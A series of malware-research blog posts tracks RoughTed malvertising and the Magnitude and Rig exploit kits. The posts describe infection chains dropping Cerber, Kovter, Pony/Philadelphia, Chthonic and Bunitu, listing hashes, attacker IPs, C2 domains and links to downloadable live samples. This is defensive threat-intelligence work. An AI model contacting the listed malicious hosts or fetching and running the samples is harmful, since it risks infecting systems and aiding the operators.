Summary:

In my previous blog I found Rig EK via RoughTed malvertising operation. I saw in the MalwareBytes article that it also redirected to Magnitude EK. Curious to find it, I set my lab up for Magnitude and went to find it. It only took about 5 minutes.

I wonder what else RoughTed leads to apart from that which has been listed.

Background Information:

• Article from RSA, although a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

• A few previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK delivers Cerber

• An article regarding RoughTed Malvertising:

https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/

This flow began with “RoughTed”. This is a malvertising operation reported on by MalwareBytes recently. Other than the initial starting point, everything else seemed fairly normal.

I have detailed Magnitude EK in previous posts so please refer to the “background information” section above for more info.

This time though I had a double landing page which opened in a separate window. I did only saw Powershell commands in processes for both “a.exe” an “b.exe“. I this flow, “b.exe” was downloaded successfully and ran which I have not seen before. The Scriptlet also failed to create a failed payload.

Below is a screenshot of what happens when the Flash File runs. It appears to generate a URL that is met with a 404 however another URL is requested to download a payload that exploits CVE-2015-2426 and in this case allows Magnitude to run Powershell commands which were successful.

The Cerber binary had a reasonably high number of detections:

SHA256:	60e2b83d21c39f78d1612c2f5a06a943d8b6cc51c1f4a51312b85dff414f4e76
File name:	b.exe
Detection ratio:	19 / 61

I only noticed one change in this Cerber and that was the ransom note said (and no typo) “Hi, I’am CERBER RANSOMWARE :)” which I’m fairly sure I have not seen before.

 

Summary:

I stumbled across an article by MalwareBytes regarding a “new” malvertising campaign they had called “RoughTed” on account of the first domain they discovered. I have not seen anyone report Rig EK publicly at least not Twitter from this campaign. Apparently it is almost a year old.

Anyway I attempted several runs and eventually landed on Rig EK which dropped Kovter click-fraud malware. Initially I did not know what this malware was having never seen it so I requested the aid of @Antelox who identified it but also noted that it was loaded by a PowerShell script which was unusual for Kovter.

The iframe to Rig EK is interesting, almost unnecessarily large script that likely does other things. Pour over the PCAP/CSV and HA report for IOC’s.

 

Background Information:

• A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

• Article on Rough Ted:

https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/

• Article on Kovter:

https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/

Downloads

(in password protected zip: (infected))

• 30-May-2017-Rig-Kovter-PCAP -> Pcap
• 30-May-2017-Rig-Kovter-CSV -> CSV of the traffic for IOC’s
• 30-May-2017-Kovter-> Kovter
• Link to Hybrid Analysis for extra IOC’s -> Here

Details of infection chain:

(click to enlarge!)

Full Details:

RoughTed is a malvertising operation known for it’s wide scope. See the MalwareBytes article above for a more in depth dive. In this chain I started with the RoughTed URL and within 5 second Rig EK had dropped a payload.

A series of 302 redirects and a check for time and possibly geo ip finally led to a domain that contained a script that appears to load Rig EK into an iframe.

Rig EK contained a pre-landing page which makes several environment checks before initiating a POST request to the landing page.

Rig Dropped Kovter – a click fraud malware known for its persistence techniques.

SHA256:	9674fe85726c33f982d58eb362cd598cd944dd8f3f9d0a1b5506b9470cb4b57e
File name:	muabump0.exe
Detection ratio:	20 / 59

Although the malware ran fine on my machine, i did sumbit it to Hybrid Analysis to identify all IOC’s. I missed the loader part which was identified by @Antelox when I gave him the sample to identify. Kovter appeared to be loaded by a huge powershell script. The image below is at max zoom and is only a 1/3rd of the script.

Below is the bottom half the the infographic which shows Kovter’s persistence.

It is described in great detail by MalwareBytes. I used the article to match IOC’s.

 

 

Summary:

Magnitude EK still continues to drop Cerber ransomware. In this flow Magnitude EK has renamed its scriplet from .sct to a .ico file. Cerber encrypted all files with a .BEEF extension in this instance. All this occurred within 60 seconds of visiting the malvertising chain. This was likely sped up by my new VM which is 64 bit and has more horse power.

I like to track Magnitude even though it’s range is very limited, it still appears to be updating and I’m fairly sure if any browser exploits are released from the June Shadow Brokers  that the Magnitude threat actors will jump on those in a flash.

Background Information:

• Article from RSA, although a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

• Previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK delivers Cerber

This flow was found through a malvertising chain. A series of 302 redirects leads to the first Magnitude profiling gate on a compromised website. These website are usually hosting financial scams. If you do not pass the profiling you are presented with a normal looking website.

I have detailed Magnitude EK in previous posts so please refer to the “background information” section above for more info.

I have changed my VM recently to a 64 bit machine. I also made a few changes to make Magnitude EK less noisy. In this run it took around 60 seconds to become infected with Cerber and no pesky UAC alerts came up.

Below is Magnitude EK’s Flash file and the payload “a.exe” which was Cerber.

SHA256:	e927fff8fe693e9c92fdbc51aeb2714a4d12aa41c6105db7e245ce9f15aa38a9
File name:	gwssy.swf
Detection ratio:	0 / 55

SHA256:	4edb020b7147324eb7abfd58a3e3a95e35ef55aa4c7838a595aa14a17ca0bf4f
File name:	a.exe
Detection ratio:	23 / 59

Cerber Encrypted my files with a .BEEF extension. I tweeted this earlier and discovered (thanks to@MarceloRivero in fact Cerber encrypts with a random 4 character extension based on the machine GUID.)

https://twitter.com/MarceloRivero/status/867415217034211329

 

In addition Magnitude EK has changed it’s scriptlet to a .ico instead of a .sct extension. This scriplet is used to bypass Applocker however the payload failed to run.

ETPRO TROJAN App Whitelist Bypass Via Com Scriptlet Inbound (A Network Trojan was Detected) [2819903]

Here is a deobfuscated version revealing what it does:

 

Summary:

 

This decoy site was serving Philadelphia ransomware the day before. I found it again through a malvertising chain and now believe it was served by Keitaro TDS.

This time it dropped Smoke Loader which downloaded and installed TeamViewer. This appeared to be a legitimate version or at least it did not trigger any AV alerts on VirusTotal. I saw an established connection but did not notice anything odd with my host. Unlike other times I have seen Smoke Loader, there was only this payload.

Background Information:

• A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

• In depth look at Smoke Loader:

https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/

 

Downloads

(in password protected zip: (infected))

• 18-May-2017-Rig-Smoke -> Pcap
• 18-May-2017-Rig-Smoke-CSV -> CSV of the traffic for IOC’s
• 18-May-2017-Smoke-TeamViewer -> Smoke Loader and TeamViewer

Details of infection chain:

(click to enlarge!)

Full Details:

A malvertising chain (possible Keitaro TDS) leads to a 302 to Rig EK.

The Rig Landing Page is hosted on IP 185.154.53.34. The landing page displayed the text “Zero bill Elementos len” in the browser.

The payload dropped was Smoke Loader which among the usual Adobe checkin requests, made a request to ” burbulator.bit” which returned config. TeamViewer was installed which appeared to be a legitimate version :

SHA256:	96578ec1817e9a5144cfa427b6c9aa6c14dd42b08d9d51fe1e2a98281024632e
File name:	TeamViewer.exe
Detection ratio:	0 / 61

The file established connection to TeamViewer servers though I did not see anyone messing about on my host. I left it running for around an hour and nothing else was dropped by SmokeLoader.

 

 

Summary:

For a few weeks I lost track of Magnitude. The proxies I was using were blocking the malvertising chain or were known to Magnitude Gates. However I have found it again and it has become the new “PseudoDarkleech” for me in that it is always seems to drop Cerber Ransomware. This time I followed the decryptor to see what the ransom was and got a special deal of 0.5654 bitcoin.

This time although I used a proxy, I modified the CSV to contain the real IP addresses. Please see previous Magnitude posts for a more detailed look at what is going on.

Background Information:

• Article from RSA, although a few months old and missing some newer aspects of Magnitude, the fundamentals have not changed.

https://community.rsa.com/community/products/netwitness/blog/2017/02/09/magnitude-exploit-kit-under-the-hood

• Previous Magnitude EK posts from me.

Multiple Magnitude EK drops Cerber Ransomware Samples

Magnitude EK delivers Cerber

This flow was found through a malvertising chain. A series of 302 redirects leads to the first Magnitude profiling gate on a compromised website. These website are usually hosting financial scams. If you do not pass the profiling you are presented with a normal looking website.

I have detailed Magnitude EK in previous posts so please refer to the “background information” section above for more info.

Magnitude is very noisy from a users point of view. It’s multiple vectors for delivering a payload such a scheduled task and use of a Scriplet creates multiple failed payloads. I think I end up with about 5-6 empty payloads after every flow. I’m not sure if these have failed due to my host or a certain requirement has not been met. What’s more is it attempts to run the Scriplet multiple times each one creates a UAC prompt to accept the command meaning I am forced to cancel or OK it in order to do anything else. All the while, Magnitude is attempting to fetch a real payload.

What seems to lead to Cerber is Magnitude’s Flash file. The URL’s with no domain have been initiated from this file. Here are the VirusTotal report on the Flash exploit 343s66fq0i75g.swf. Magnitude’s Flash exploits always have a very low detection rate in fact this one was zero at the time of writing.

SHA256:	d77aa8f5c7826c271cfc4f9be1b4b11863351add4cba4161005b134e80651fcb
File name:	343s66fq0i75g.swf
Detection ratio:	0 / 56

Oddly my version of Cerber had already been uploaded to Virus Total which meant the detection’s were quite high. This is very strange because usually Cerber has a unique hash for every sample (or at least from my experience from EK’s it has.).

There is also an option to decrypt 1 file for free to test that it is actually working. I did not try this but judging by the professionalism of this “service” it is likely it would work.

Summary:

It’s always interesting to find different malwares from Rig EK. This campaign was found from malvertising. There did not appear to be a compromised site as such so it could be a possible TDS. The landing page and flash/payload appeared to be hosted on different IP addresses which is unusual.

The initial payload was Pony loader which loaded a ransomware known as Philadelphia ransomware. This ransomware is created from a builder. The instructions are here.

It encrypted files with a .locked extension and demanded a 0.3 Bitcoin ransom. It is not known to be a particularly sophisticated malware.

I requested the help of @Antelox again who quickly identified it as Pony/Philadelphia just from my description.

Background Information:

• A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

• Articles regarding Philadelphia ransomware.

https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware

https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/

Downloads

(in password protected zip: (infected))

• 15-May-2017-Rig-Pony-Ransom -> Pcap
• 15-May-2017-Rig-Pony-Ransom-CSV -> CSV of the traffic for IOC’s
• 15-May-2017-Pony-Philadelphia -> Pony loader and Philadelphia ransomware

Details of infection chain:

(click to enlarge!)

Full Details:

A malvertising chain (possible Keitaro TDS) leads to a 302 to Rig EK.

The Rig Landing Page is 69.61.66.226 however the Flash file and Payload comes from 185.158.112.49 which also appears to have no domain. The landing page displayed the text “Hehe nuclear” in the browser.

The payload dropped was Pony loader which made a POST request to  89.45.67.99
/ppp/gate.php

SHA256:	82a363d6e60ec002b7d76f05970292b993f9ef72192e1db552b1f32b907cd466
File name:	oeloatd4.exe
Detection ratio:	22 / 61

Pony downloads a large executable which is a Philadelphia ransomware variant.

SHA256:	661133c3848e57c4541a54b094c1b7124986872c4ce475ceda02440b48c823c1
File name:	2223607.exe
Detection ratio:	41 / 61

The ransomware appeared to be very noisy. The CnC used the user agent string “AutoIt” and the URL’s were self explanatory such as “de/de.php?p=Ping&id=5918651572eb6&s=Encrypting+%280+files%29”. The ransomware is written in the AutoIT scripting language.

Finally a window is created with a red ransom demand. A ransom note is created and all files are encrypted using the .locked extension. It also appeared to lock me out of accessing common folders such as Pictures. The ransomware demands 0.3 Bitcoin.

 

This is a list of files that were dropped (You can download these):

Summary:

Following a common malvertising chain I came across a website that redirected to a fake ad domain. Such gates have been detailed by other researchers such as Malware Breakdown. They contain a pre-landing page which further filters out unwanted visitors before the Rig EK landing page.

This example is a full chain and dropped Chthonic which is a ZeuS variant. I requested the help of @Antelox who quickly identified it as Chthonic. I thought the “.bit” traffic was familiar but it has been a while since I saw this malware.

Background Information:

• A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

• Oldish article regarding Chthonic banking trojan:

https://securelist.com/blog/virus-watch/68176/chthonic-a-new-modification-of-zeus/

Downloads

(in password protected zip: (infected))

• 13-May-2017-RigEK-Chthonic -> Pcap
• 13-May-2017-Rig-Chthonic-CSV -> CSV of the traffic for IOC’s
• 13-May-2017-Chthonic -> ZeuS Chthonic

Details of infection chain:

(click to enlarge!)

Full Details:

• A malvertising chain leads to a porn site called “likexhamster“. This is similar to the real xhamster website except with more Rig. The website contains a script called “popunder.php” which loads the fake ad domain “retalise.info“.
• The domain contains a pre-landing page and an iframe to Rig EK.
• one.dailynewshunt.co.in-> Landing Page -> Flash  -> Payload
• Dropped payload “4s64tsmt.exe”.
  

  SHA256:	6ef6dd38e0b763ff9877bd657ddbefc76ae72de7d49b0a5b82690c039036e1ee
  File name:	4s64tsmt.exe
  Detection ratio:	27 / 61

• This was identified as Chthonic which is a ZeuS variant by @Antelox.
• Chthonic lay idle for some time in processes. It eventually created an executable called “WindowsMailB” and a UAC prompt appeared which when accepted rebooted the system.
• After reboot the malware had added a start up entry and copied itself .It also downloaded a further binary which was likely a module.
• POST traffic to  “multifest.bit” was observed.  It is likely sending data to a CnC and getting a configuration back.
• There may be other interesting connections in the PCAP. I have not found any recent detailed write ups about Chthonic yet. According to the 2014 article by securelist, Chthonic has the following capabilities: 

Summary:

I have been tracking Rig EK campaigns that drop Bunitu for a while now but lately I’ve had some trouble with my lab getting the payload to download properly. Fortunately I have a sandbox which I can use. I’m sure I will figure out the issue!

This particular compromised site at 78.47.1.194 has a fairly long history of changing it’s domains. It is similar to 78.46.232.211 which is the other IP that I know of. They all contain an iframe leading to a URL on the same IP which contains another iframe which leads to Rig EK. As before this iframe contains the tag “small” so I like to call it the “small gate”.

As I ran this one in my sandbox, it evaluated the JavaScript and removed all the obfuscation save for base64. This is available to download below.

Background Information:

• A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

• Article on Bunitu Trojan:

https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/

Downloads

(in password protected zip)

• 12-May-2017-Rig-Bunitu -> Pcap
• 12-May-2017-Bunitu -> Bunitu (exe and dll)
• 12-May-2017-Rig-Bunitu-CSV -> CSV of traffic

As a bonus I’ve also included a deobfuscated version of the landing page:

• 12-May-2017-Rig-Landing-Clear

Details of infection chain:

(click to enlarge!)

Full Details:

• A malvertising chain leads to Rig EK which delivers Bunitu. The website contains an iframe which leads to another domain on the same IP which contains an iframe to Rig EK.
• The payload was rritws0m.exe though i renamed it.

• SHA256:	817e477fcf49c02945e2929d7e661bc25bd1e35a564ac65ae368efdeddc21725
  File name:	817e477fcf49c02945e2929d7e661bc25bd1e35a564ac65ae368efdeddc21725.bin
  Detection ratio:	12 / 61

• Bunitu uses a DLL called zazxirr.dll.

• SHA256:	9c0d1b7105f3cbbbfee53e977a82d9ef70b0034392238a910daca68ee00c3158
  File name:	zazxirr.dll.bin
  Detection ratio:	19 / 61

• Bunitu opens random ports by changing firewall settings and allows the host to become a remote proxy.
• Every time a client connects, Bunitu issues a DNS request. Although these did not trigger any ET signatures I am sure they are initiated by Bunitu.

Summary:

I’ve been away for some time busy moving house but it seems the EK front is very quiet the last few weeks. I’ve been unable to find Magnitude EK and many of my malvertising chains have turned up dry. Not even hurtmehard.net had something.

So I decided to revisit an IP hosting a gate I called the ‘small’ gate on account that the iframe to Rig always contained the small tag. This gate always led to Bunitu proxy trojan. However this time it failed.

I have seen several failures since I began hunting EK’s. I saw a few with Sundown and many with Magnitude. I have always presumed it may be my lab but this could indicate an update to Rig but the threat actors have yet to push it. I did notice the new parameters several other researches have mentioned. This lull could indicate calm before a storm or a decline in Rig EK.

Background Information:

• A few articles on Rig exploit kit and it’s evolution:

https://www.uperesia.com/analyzing-rig-exploit-kit
http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html
http://securityaffairs.co/wordpress/55354/cyber-crime/rig-exploit-kit-cerber.html

Downloads

(in password protected zip)

• 2017-May-09-Rig-Fail-> Pcap
• 2017-May-09-RigFlash -> Rig EK Flash File (5a0dbcb57a68f3ac3c00e7de1a5de577e3fe747829eccf62ba294b1db0c60b7e)
• 2017-May-09-Rig-CSV– CSV of URL’s.

Details of infection chain:

(click to enlarge!)

Full Details:

As noted by other researchers, Rig EK is using 3 new parameters.

This particular gate which could be referred to as the “small” gate (since all redirections to Rig EK contained the “small” tag) used to drop Bunitu

However this time it appeared to fail. In addition I did not see any wscript. The EK did run the following command however.

I have not dug into the landing page yet to look for any significant changes. I’m not sure why the payload failed but it could be due to my host or a Rig EK update that the threat actor has yet to apply.